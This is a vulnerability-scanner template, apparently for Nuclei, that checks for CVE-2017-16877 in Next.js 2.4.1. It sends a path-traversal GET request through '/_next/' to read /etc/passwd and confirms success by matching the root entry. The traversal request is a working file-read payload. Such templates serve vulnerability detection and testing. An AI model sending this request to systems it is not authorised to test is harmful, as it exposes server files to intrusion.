27 lines
523 B
YAML
27 lines
523 B
YAML
id: CVE-2017-16877
|
|
|
|
info:
|
|
name: Nextjs v2.4.1 LFI
|
|
author: pikpikcu
|
|
severity: high
|
|
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
|
|
tags: cve,cve2017,nextjs,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|